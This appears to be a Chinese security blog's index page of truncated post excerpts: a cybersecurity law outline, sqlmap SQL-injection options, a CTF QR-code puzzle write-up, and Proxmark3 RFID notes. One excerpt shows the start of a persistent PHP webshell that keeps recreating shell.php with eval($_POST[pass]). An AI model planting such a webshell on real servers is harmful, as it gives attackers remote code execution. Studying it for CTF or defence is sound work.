Tip
0

目录 第一章 总 则 第二章 网络安全支持与促进 第三章 网络运行安全 第一节 一般规定 第二节 关键信息基础设施的运行安全 第四章 网络信息安全 第五章…

Web
0

0x01: flush session 参数是—flush-session 0x02: 显示详细payload -v -vv 0x03: POST注入 参数为-r可以指定一个POST请求包。 0x04: tamper 用法:—tamper=xxx,xxxx 自带…

Web
0

这是一个内存马: <?php ignore_user_abort(true); set_time_limit(0); $file = "shell.php"; $shell = "<?php eval(\$_POST[pass]);?>"; while(true) { if(!file_exists($file)) {…

MISC
0

这题一直做到比赛结束都没出…然后又做了近两个小时才拿到flag。 0x01 一道400分的MISC,下载文件下来是一个3gp后缀的类似gif一样,每一帧都显示出一部分,提取出来是一张完整的图片,上半部分是半个二维码,下半部分写着“后面没有咯”。 0x02 先把半个二维码顺时针旋转90度,然后我拿出photoshop,打开标尺和网格…开始还原,历经近1小时,因为ps不太熟练,现学的,成品如图: 0x03 没了思路,于是开始google,找到题目出处,seccon ctf 2014的qr easy这题。 然后找到当时的wp: https://yous.be/2014/12/07/seccon-ctf-2014-qr-easy-write-up/ 下面就是复现了。 0x04 首先明确本题的QR…

RFID
0

前一篇只是对一些pm3常用命令的介绍,而且也没有很具体,只是记录了一些我测试的过程。

Writeup
0

最近没有时间整理,暂时存下FlappyPig发在安全客的writeup: http://bobao.360.cn/ctf/learning/186.html

1 2 3 4